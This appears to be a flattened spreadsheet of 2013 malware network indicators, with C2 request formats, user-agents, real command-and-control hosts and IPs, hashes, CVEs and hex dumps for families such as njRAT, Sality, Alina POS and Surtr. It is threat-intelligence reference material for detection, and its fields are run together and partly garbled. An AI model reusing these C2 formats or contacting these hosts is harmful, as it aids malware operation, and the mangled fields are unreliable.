Mozilla/5.0 (Windows NT 6.1; rv:22.0)
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0)
Mozilla/5.0 (Windows NT 6.2)
Mozilla/5.0 (Windows NT 6.2; rv:21.0)
Mozilla/5.0 (Windows NT 6.2; WOW64)
Mozilla/5.0 (X11; Linux i686; rv:21.0)
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0)
Opera/9.80 (Windows NT 5.1; U; zh-sg)
Opera/9.80 (Windows NT 6.0)
Opera/9.80 (Windows NT 6.1; U; es-ES)
1052C94DC5C9BB7B99658C275B7337C64B33http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Backdoor%3AWin32%2FKelihos.F#tab=2http://bit.ly/crimesampleshttp://bit.ly/crimepcapshttp://contagioexchange.blogspot.com/2013/09/kelihos-strings-CRIME.html9/8/2013
73
2013-08-27CRIMEKuluoz Run command from C2n
c=run&u=/get/7d2c37d2070e1b38 6070db8c851dae08.exe&crc= 9e2b9c4f465 b765fc971423935c4b68e
&crc=HTTP/1.1 200 OK
Server: nginx/1.2.6
Date: Tue, 27 Aug 2013 20:06:57 GMT
Content-Type: text/html
Content-Length: 86
Connection: close
X-Powered-By: PHP/5.4.4-7
Vary: Accept-Encoding
74
8/22/2013 23:58:00 <p> 2015-02-03APTnjRAT / Backdoor.LV<p> lv|'|'|TndfQzQyNjRFQkI =|'|'|VICTIM|'|'| Examiner|'|'|2013-06-21|'|'|USA|'|'| Win XP ProfessionalSP2 ...

<p> 171.ll|'|'|Li4uLi4uLk5FVy4 uLi4u Li4uX0F FNTJDMzdE|'|'|SENTA|'|'| sentai55|'|'|15-01-29|'|'||'|'| Win 8.1SP0 x64|'|'|Yes|'|'|0.7d| '|'|..|'|'||'|'|b88ece4c04f706 c9717bbe6fb da49ed2,132.inf|'|'|Li4uLi4uLk5FVy4uL i4uLi4uDQpyZWVlZWVk LmR5bmRucy5iaXo6M jUyNTQNCkFwcERhdGENCldpbnJhci5leG UNClRydWUNCkZhbHNlDQpU cnVlDQpGYWxzZQ==0.

<p> 251.ll|'|'|Li4uLi4uLk5FVy4uLi4uLi4uX 0FFNTJD MzdE|'|'|SENTA|'|'|senta i55|'|'|15-01-29|'|'||'|'|Win 8.1SP0 x64|'|'|Yes|'|'|0.7d|'|'|..|'|'|QnVyd 2V sbCB2LiBIb2JieSBMb2JieSBBYnJp ZGdlZCBbQ29tcGF0aWJpbGl 0eSBNb 2RlXSAtIFdvcmQA|'|'|b88ece4c04f706c9717bbe6fbda49ed2,

<p>lv|'|'|VHJvamFuX0M0NkY2RTk= |'|'|MARK|'|'|user |'|'|2013-11-22|'|'||'|'|Win XP|'|'|No|'|'|0.6.4|'|'|..|'|'||'|'|[endof]
<p> lv <p> 171.ll <p> 251.ll
1d3baedd747f6f9bf92c81eb9f63b34bhttp://www.threatgeek.com/2013/06/fidelis-threat-advisory-1009-njrat-uncovered.htmlhttp://bit.ly/aptsampleshttp://contagioexchange.blogspot.com/2013/08/njrat-backdoorlv-strings-apt.html6/13/2013CK
75
2013-08-21CRIMEChimerka.1 / Refyes.APOST/sys.php/sys.phpHost: rxform.org
Content-type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.0.1) Gecko/20021216 Chimera/0.6
Referer: http://www.gmail.com
Content-length: 112
Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.0.1) Gecko/20021216 Chimera/0.6bede0da1abc1122acf8af91f6d6b289fhttp://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Trojan:Win32/Refeys.A#tab=2http://bit.ly/crimesampleshttp://contagioexchange.blogspot.com/2013/08/refeysa-strings-CRIME.html8/1/2013
76
2013-08-21CRIMESalityGET/images/logos.gif?1f5428=8212640/logos.gif?User-Agent: Opera/9.50 (Windows NT 6.0; U; en)
Host: boyabateml.k12.tr
Cache-Control: no-cache
Opera/9.50 (Windows NT 6.0; U; en)
Opera/8.89 (Windows NT 6.0; U; en)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.1 (.NET CLR 3.5.30731)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50728)
176222923eaa64b43b4f75f8afaad81e
a972f612afa03f1d0b3ffad10843e935
4f693f209daccf69b1c785573c0002c5
8/1/2013
77
2013-08-19CRIMENitedremGET/down.asp?action=install&u=cpmcpm&p= 2366A64BAA384EA6AB9CEF73E8E2BE12&t =7393/down.asp?action=install&u=User-Agent: fucking
Host: bucks.onepiecedream.com:99
fucking80,88,99508af8c499102ad2ebc1a83fdbcefecbhttp://about-threats.trendmicro.com/Malware.aspx?id=54252&name=TROJ_NITEDREM.AB&language=enhttp://bit.ly/crimesampleshttp://bit.ly/crimepcapshttp://contagioexchange.blogspot.com/2013/08/nitedrem-strings-CRIME.html8/1/2013
78
2013-08-19CRIMENitedremGET/upx/kod.txt?k=123&t=7215/kod.txt?k=123&t=User-Agent: fucking
Host: 103.20.193.231:88
User-Agent: fucking80,88,99508af8c499102ad2ebc1a83fdbcefecbhttp://about-threats.trendmicro.com/Malware.aspx?id=54252&name=TROJ_NITEDREM.AB&language=enhttp://bit.ly/crimesampleshttp://bit.ly/crimepcapshttp://contagioexchange.blogspot.com/2013/08/nitedrem-strings-CRIME.html8/1/2013
79
2013-08-19CRIMENitedremGET...............2817324n-79s4-43q8-8n2n-676s3qr1ops5:..............................2817324n-79s4-43q8-8n2n-676s3qr1ops5:...............80,88,99508af8c499102ad2ebc1a83fdbcefecbhttp://about-threats.trendmicro.com/Malware.aspx?id=54252&name=TROJ_NITEDREM.AB&language=enhttp://bit.ly/crimesampleshttp://bit.ly/crimepcapshttp://contagioexchange.blogspot.com/2013/08/nitedrem-strings-CRIME.html8/1/2013
80
2013-08-19CRIMENitedremGET/config.txt?&t=4593/config.txt?&t=User-Agent: Update
Host: in.onepiecedream.com:99
Cache-Control: no-cache
Update80,88,99508af8c499102ad2ebc1a83fdbcefecbhttp://about-threats.trendmicro.com/Malware.aspx?id=54252&name=TROJ_NITEDREM.AB&language=enhttp://bit.ly/crimesampleshttp://bit.ly/crimepcapshttp://contagioexchange.blogspot.com/2013/08/nitedrem-strings-CRIME.html8/1/2013
81
2013-08-19CRIMENitedremGET/fish.jpg?&t=4426/fish.jpg?&t=User-Agent: Update
Host: www.dianwofacai.com
Cache-Control: no-cache
Update80,88,99508af8c499102ad2ebc1a83fdbcefecbhttp://about-threats.trendmicro.com/Malware.aspx?id=54252&name=TROJ_NITEDREM.AB&language=enhttp://bit.ly/crimesampleshttp://bit.ly/crimepcapshttp://contagioexchange.blogspot.com/2013/08/nitedrem-strings-CRIME.html8/1/2013
82
2013-08-17CRIMESalityGET/?12da89=12355930/?12da89=User-Agent: KUKU v5.06exp =9355466431
Host: www.kjwre9fqwieluoi.info
Cache-Control: no-cache
KUKU v5.06exp =9355466431CEAF4D9E1F408299144E75D7F29C1810http://www.symantec.com/connect/blogs/all-one-malware-overview-salityhttp://bit.ly/crimesampleshttp://bit.ly/crimepcapshttp://contagioexchange.blogspot.com/2013/08/sality-strings-CRIME.html8/1/2013
83
2013-08-17CRIMESalityGET/images/logos.gif?114bbc=9068000/logos.gif?User-Agent: KUKU v5.06exp =9355466431
Host: hayatspa.com
Cache-Control: no-cache
User-Agent: KUKU v5.06exp =9355466431CEAF4D9E1F408299144E75D7F29C1810http://www.symantec.com/connect/blogs/all-one-malware-overview-salityhttp://bit.ly/crimesampleshttp://bit.ly/crimepcapshttp://contagioexchange.blogspot.com/2013/08/sality-strings-CRIME.html8/1/2013
84
2013-08-17CRIMESalityGET/setting.doc/setting.docHost: yahoo.com
Cache-Control: no-cache
CEAF4D9E1F408299144E75D7F29C1810http://www.symantec.com/connect/blogs/all-one-malware-overview-salityhttp://bit.ly/crimesampleshttp://bit.ly/crimepcapshttp://contagioexchange.blogspot.com/2013/08/sality-strings-CRIME.html8/1/2013
85
2013-08-16CRIMETorpig /Sinowal miniloaderGET/Host: 166.78.144.80
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
Content-Length: 247
Connection: close
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)011C1CA6030EE091CE7C20CD3AAECFA0http://blog.fox-it.com/2012/03/16/post-mortem-report-on-the-sinowallnu-nl-incident/http://bit.ly/crimesampleshttp://bit.ly/crimepcapshttp://contagioexchange.blogspot.com/2013/08/torpig-miniloader-strings-CRIME.html8/1/2013
86
2013-08-16CRIMETorpig /Sinowal miniloaderGET/search2?fr=altavista&itag=ody&q= b88d6ce7e9fe419788716298cc747adc %2C93a5d8146fea0bbb&kgs=1&kls=0/search2?fr=Content-Type: application/x-www-form-urlencoded
Host: annotatinggramma.info
Content-Length: 2804
Connection: Keep-Alive
Cache-Control: no-cache
011C1CA6030EE091CE7C20CD3AAECFA0http://blog.fox-it.com/2012/03/16/post-mortem-report-on-the-sinowallnu-nl-incident/http://bit.ly/crimepcapshttp://contagioexchange.blogspot.com/2013/08/torpig-miniloader-strings-CRIME.html8/1/2013
87
2013-08-13CRIMEEK PopadsGET/?7d456d68729292e9843cb9dde2d2f7b4=34/?/?7d456d68729292e9843cb9dde2d2f7b4=34
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://creditforums.com/discover-card/2648-why-so-hard-get-approved-discover-card.html
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: xrp.8taglik.info
Connection: Keep-Alive
some payload TTF:CVE-2011-3402 8b0c74e2c558d604b5443c7ad8c3aeb6.eot
CVE-2013-0422 ccfabd9cd566790d989e29958485c8c2
http://www.malwaresigs.com/2013/03/26/popads-exploit-kit/http://bit.ly/crimesamples8/1/2013
88
2013-08-13CRIMEEK PopadsGET/4d23ccceb2cf9e6c1c91df06170259d3/32cd ad27bdec4a68d8efc9bb835008e6.swfAccept: */*
Accept-Language: en-US
Referer: http://qkvuz.12taglik.info/?82f98f39d50070ac6bccd765eb93b37e=y15&8d97baff25493bce238a6ac40dbd2dc1=perfectboys.org
x-flash-version: 11,7,700,202
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: qkvuz.12taglik.info
Connection: Keep-Alive
nasome payload TTF:CVE-2011-3402 8b0c74e2c558d604b5443c7ad8c3aeb6.eot
CVE-2013-0422 ccfabd9cd566790d989e29958485c8c2
http://www.malwaresigs.com/2013/03/26/popads-exploit-kit/http://bit.ly/crimesamples8/1/2013
89
2013-08-13CRIMEEK PopadsGET/855feed4acbb99c63ad7f25fef289284/decaff5b6ee 641742f53d8ef8c6f9a16.jar/855feed4acbb99c63ad7f25fef289284/decaff5b6ee641742f53d8ef8c6f9a16.jar
content-type: application/x-java-archive
accept-encoding: pack200-gzip,gzip
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.7.0_07
Host: fizv.11taglik.info
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
nasome payload TTF:CVE-2011-3402 8b0c74e2c558d604b5443c7ad8c3aeb6.eot
CVE-2013-0422 ccfabd9cd566790d989e29958485c8c2
http://www.malwaresigs.com/2013/03/26/popads-exploit-kit/http://bit.ly/crimesamples8/1/2013
90
2013-08-13CRIMEEK PopadsGET/?c480cfaa684e1dc0db1b2e1f891d814a= a15&8524421677ca0f8c20fd1cd2c1c6e0a7=sansit.in/?c480cfaa684e1dc0db1b2e1f891d814a=a15&8524421677ca0f8c20fd1cd2c1c6e0a7=sansit.in
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: tqhsy.8taglik.info
Connection: Keep-Alive
nasome payload TTF:CVE-2011-3402 8b0c74e2c558d604b5443c7ad8c3aeb6.eot
CVE-2013-0422 ccfabd9cd566790d989e29958485c8c2
http://www.malwaresigs.com/2013/03/26/popads-exploit-kit/http://bit.ly/crimesamples8/1/2013
91
2013-08-13CRIMEEK PopadsGET/39ff9ff8c3b603d8eed017df64dd2799.eotAccept: */*
Referer: http://fizv.11taglik.info/?0090c763e668fab7bbb1c5576207655f=q10&c561f8448a523af56b17eb9ac7ad7a58=sansit.in
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET4.0C; .NET4.0E; InfoPath.3)
Accept-Encoding: gzip, deflate
Host: fizv.11taglik.info
Connection: Keep-Alive
naTTF:CVE-2011-3402 8b0c74e2c558d604b5443c7ad8c3aeb6.eothttp://www.malwaresigs.com/2013/03/26/popads-exploit-kit/http://bit.ly/crimesamples8/1/2013
92
2013-08-11CRIMEAlina POS v5.6POST/duck/push.phppush.phpAccept: application/octet-stream
Content-Type: application/octet-stream
Connection: Close
User-Agent: Alina v5.6
Host: 208.98.63.226
Content-Length: 82
Cache-Control: no-cache
Alina v5.65A22ED78B6454E34217D07C4AF37B23Bhttp://blog.spiderlabs.com/2013/06/alina-following-the-shadow-part-2.htmlhttp://bit.ly/crimesampleshttp://bit.ly/crimepcapshttp://contagioexchange.blogspot.com/2013/08/alina-pos-v56-strings-CRIME.html2013-06
93
2013-08-11CRIMEAlina POS v5.6POST/adobe/version_check.php/version_check.phpAccept: application/octet-stream
Content-Type: application/octet-stream
Connection: Close
User-Agent: Alina v5.3
Host: 91.229.76.97
Content-Length: 2980
Cache-Control: no-cache
Alina v5.34c754150639aa3a86ca4d6b6342820behttp://blog.spiderlabs.com/2013/06/alina-following-the-shadow-part-2.htmlhttp://bit.ly/crimesampleshttp://bit.ly/crimepcapshttp://contagioexchange.blogspot.com/2013/08/alina-pos-strings-CRIME.html2013-06
94
2013-08-11CRIMEAlina POS v6.0POST/adobe/version_check.php/version_check.phpAccept: application/octet-stream
Content-Type: application/octet-stream
Connection: Close
User-Agent: Alina v6.0
Host: 91.229.76.97
Content-Length: 3349
Cache-Control: no-cache
Alina v6.0http://blog.spiderlabs.com/2013/06/alina-following-the-shadow-part-2.html2013-08
95
2013-08-09APT (IN)Hanove / TouristPOST/kamp.php/kamp.php/kamp.php
Content-Type: multipart/form-data; boundary=78DDB5A902BB8FFF3F398B45BEDCD152
User-Agent: SIMPLE
Host: http://[xxx]
Content-Length: 501
Cache-Control: no-cache

--78DDB5A902BB8FFF3F398B45BEDCD152
Content-Disposition: form-data; name="uploaddir"

water/USER-6E3C3361930800270A87A2/D/
--78DDB5A902BB8FFF3F398B45BEDCD152
Content-Disposition: form-data; name="filename"; filename="license_23_05_2004_08_10_00.txt"
Content-Type: text/plain
Content-Transfer-Encoding: binary
SIMPLE37207835e128516fe17af3dacc83a00c2011:09:21
96
2013-08-07APTSurtr 2nd Stage DL00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000060 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000070 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000080 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000090 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
000000A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
000000B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
000000C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
000000D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
000000E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
000000F0 00 00 00 00 00 00 00 03 af d7 a5 01 23 01 00 00 ........ ....#...
00000100 4a 00 00 00 78 9c 13 65 30 63 30 01 62 73 06 23 J...x..e 0c0.bs.#
00000110 06 0b 06 37 20 e9 06 84 26 0c 06 0c a4 02 00 a8 ...7 ... &.......
6178, 8089, 9696.[0x0 padding] [0x5 bytes header] [0x4 bytes for compressed packet length including preceding 0x0s] [0x4 bytes for decompressed packet length + length of preceding 0's] [0x78 0x9c (zlib stream header)] [ compressed data ]

2nd stage traffic
36E194F7DF2F2FD020E3800AB77F7E82 (2.tmp - payload)
8c06aec37c7e51f581aaa41f66d4ebad (RTF), 21aa9dd44738d5bf9d8a8ecf53c3108c or 21aa9dd44738d5bf9d8a8ecf53c3108c - Stage 2 dl
https://citizenlab.org/2013/08/surtr-malware-family-targeting-the-tibetan-community/http://bit.ly/aptsamplesStrings (in stage 2):
x86_GmRemote.dll
Mark
D:\Project\GTProject\Public\List\ListManager.cpp

There are multiple stage 2 versions but this is the one we've seen most often. (CitizenLab)
8/2/2013
97
2013-08-07APTSurtr 2nd Stage DL00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........<removed>
00000100 9c 13 00 00 00 00 00 00 00 50 0e 00 00 4d 5a 90 ........ .P...MZ.
00000110 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 ........ ........
00000120 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 .....@.. ........
00000130 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000140 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba ........ ........
00000150 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 .....!.. L.!This
00000160 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 program cannot b
00000170 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 e run in DOS mod
00000180 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 36 31 e....$.. .....#61
6178, 8089, 9696.2nd stage Download36E194F7DF2F2FD020E3800AB77F7E82 (2.tmp - payload)
8c06aec37c7e51f581aaa41f66d4ebad (RTF), 21aa9dd44738d5bf9d8a8ecf53c3108c or 21aa9dd44738d5bf9d8a8ecf53c3108c - Stage 2 dl
https://citizenlab.org/2013/08/surtr-malware-family-targeting-the-tibetan-community/http://bit.ly/aptsamples8/2/2013
98
2013-08-07APTSurtr Initial GET00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
<removed>.
00000100 0a 00 00 00 64 00 00 00 00 00 00 00 00 00 ....d... ......
6178, 8089, 9696.Initial GET36E194F7DF2F2FD020E3800AB77F7E82 (2.tmp - payload)
8c06aec37c7e51f581aaa41f66d4ebad (RTF), 21aa9dd44738d5bf9d8a8ecf53c3108c or 21aa9dd44738d5bf9d8a8ecf53c3108c - Stage 2 dl
https://citizenlab.org/2013/08/surtr-malware-family-targeting-the-tibetan-community/http://bit.ly/aptsamplesStrings (in stage 1):
CrtRunTime.log
aCvVpR
_One.dll
_Fra.dll
soul
LiveUpdata_Mem\
Burn\
8/2/2013
99
2013-07-15APTTaleretGET//
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: mac.gov.skies.tw
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: MCI=HHMHMBLHEHNLIOJRINRIJPRJIJ; MUID=ba2c08421000e9621000355b0000
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)443FED166A667AB9CBB1EF6331B8E9D7894
5328CFCB46EF18ECF7BA0D21A7ADC02C
http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=TrojanDownloader:Win32/Taleret.D#techdetails_linkhttp://bit.ly/aptsampleshttp://bit.ly/aptpcapsSoftware\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
DefaultConnectionSettings
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
explorer.exe http://contagioexchange.blogspot.com/2013/08/taleret-strings-apt.html http://contagioexchange.blogspot.com/2013/08/taleret-strings-apt-1.html
7/1/2013
100
2013-07-15APTTaleretGET/jw!Dyz0_2mTExQ0xbBnlp.RZcXoHmU-User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: tw.myblog.yahoo.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: B=8sah02d6on6k9&b=3&s=as
Mozilla/4.0 (compatible; MSIE 6.0; Win32)FED166A667AB9CBB1EF6331B8E9D7894
5328CFCB46EF18ECF7BA0D21A7ADC02C
http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=TrojanDownloader:Win32/Taleret.D#techdetails_linkhttp://bit.ly/aptsampleshttp://bit.ly/aptpcapshttp://contagioexchange.blogspot.com/2013/08/taleret-strings-apt.html http://contagioexchange.blogspot.com/2013/08/taleret-strings-apt-1.html7/1/2013